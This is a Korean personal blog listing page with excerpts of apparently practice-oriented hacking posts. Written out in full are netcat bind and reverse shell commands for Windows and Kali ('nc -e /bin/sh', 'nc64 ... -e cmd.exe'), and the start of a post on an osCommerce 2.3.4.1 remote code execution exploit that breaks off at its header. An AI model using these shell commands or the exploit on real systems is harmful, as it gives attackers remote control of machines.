목록전체 글 (420)
외로운 Nova의 작업실
- 윈도우 nc64 바인드 쉘코드 - kali nc 192.168.219.130 8989 - window nc64 -l -e cmd.exe -p 8989 - 윈도우 nc64 리버스 쉘코드 - window exec("nc64 192.168.219.120 -e cmd.exe 8989"); - kali nc -l -p 8989
- nc nc는 바인드 쉘과 리버스 쉘을 할때 많이 사용되는 프로그램입니다. 보통 리눅스에서는 기본으로 설치되어있지만 윈도우는 따로 설치해주셔야합니다. 아래 링크로 들어가서 설치할 수 있습니다. https://eternallybored.org/misc/netcat/ - nc 사용법 nc 192.168.200.1 7979:192.168.200.1에 7979포트에 접속합니다. nc -l -p 7979:7979포트에 listen합니다. nc -e /bin/sh 192.168.220.1 7979 : 192.168.220.1 ip에 7979포트로 쉘프로그램을 연결합니다. nc64 192.132.123.123 -e cmd.exe 7979 : 192.132.123.123 ip에 7979포트로 쉘프로그램을 연결합니다...
- osCommerce 2.3.4.1 - Remote Code Execution oscommerce는 장바구니가 있는 쇼핑몰을 만들때 사용하는 오픈소스 웹 소스입니다. 아파치를 설치하고 그 아파치위에 oscommerce 소스를 넣으면 손쉽게 웹 형태로 쇼핑몰을 만들 수 있습니다. 마치 네이버 스마트스토어와 같이 말입니다. 해당 취약점은 관리자가 oscommerce를 설치하고 install.php를 삭제하지 않은 경우에 일어납니다. 익스플로잇 코드는 아래와 같습니다. # Exploit Title: osCommerce 2.3.4.1 Remote Code Execution # Date: 29.0.3.2018 # Exploit Author: Simon Scannell - https://scannell-infos..